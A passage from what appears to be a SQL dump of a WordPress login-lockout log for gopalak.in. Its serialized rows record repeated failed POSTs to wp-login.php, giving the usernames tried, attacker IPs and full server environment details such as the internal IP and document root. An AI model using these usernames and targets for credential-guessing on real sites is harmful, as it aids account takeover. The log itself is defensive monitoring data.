bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63192\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752156.023869;s:12:\"REQUEST_TIME\";i:1746752156;}}','35.154.1.88',1,'2025-05-09 06:25:57','2025-05-10 07:10:33'),(95031,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63189\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752156.0147851;s:12:\"REQUEST_TIME\";i:1746752156;}}','35.154.1.88',1,'2025-05-09 06:25:57','2025-05-10 07:10:31'),(95032,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63198\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752156.959409;s:12:\"REQUEST_TIME\";i:1746752156;}}','35.154.1.88',1,'2025-05-09 06:25:58','2025-05-10 07:10:34'),(95033,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52528\";s:11:\"REMOTE_ADDR\";s:13:\"8.218.212.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752671.007503;s:12:\"REQUEST_TIME\";i:1746752671;}}','8.218.212.177',0,'2025-05-09 06:34:32','1970-01-01 00:00:00'),(95034,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42384\";s:11:\"REMOTE_ADDR\";s:14:\"68.178.168.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753279.670054;s:12:\"REQUEST_TIME\";i:1746753279;}}','68.178.168.103',0,'2025-05-09 06:44:41','1970-01-01 00:00:00'),(95035,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55443\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753484.9572079;s:12:\"REQUEST_TIME\";i:1746753484;}}','35.154.1.88',1,'2025-05-09 06:48:07','2025-05-10 07:10:31'),(95036,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55445\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753484.958137;s:12:\"REQUEST_TIME\";i:1746753484;}}','35.154.1.88',1,'2025-05-09 06:48:07','2025-05-10 07:10:32'),(95037,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55437\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753486.705755;s:12:\"REQUEST_TIME\";i:1746753486;}}','35.154.1.88',1,'2025-05-09 06:48:08','2025-05-10 07:10:33'),(95038,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55444\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753486.704731;s:12:\"REQUEST_TIME\";i:1746753486;}}','35.154.1.88',1,'2025-05-09 06:48:08','2025-05-10 07:10:33'),(95039,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55446\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753487.730711;s:12:\"REQUEST_TIME\";i:1746753487;}}','35.154.1.88',1,'2025-05-09 06:48:09','2025-05-10 07:10:34'),(95040,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42206\";s:11:\"REMOTE_ADDR\";s:14:\"103.173.227.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746753892.2256961;s:12:\"REQUEST_TIME\";i:1746753892;}}','103.173.227.63',0,'2025-05-09 06:54:54','1970-01-01 00:00:00'),(95041,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54530\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.200.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";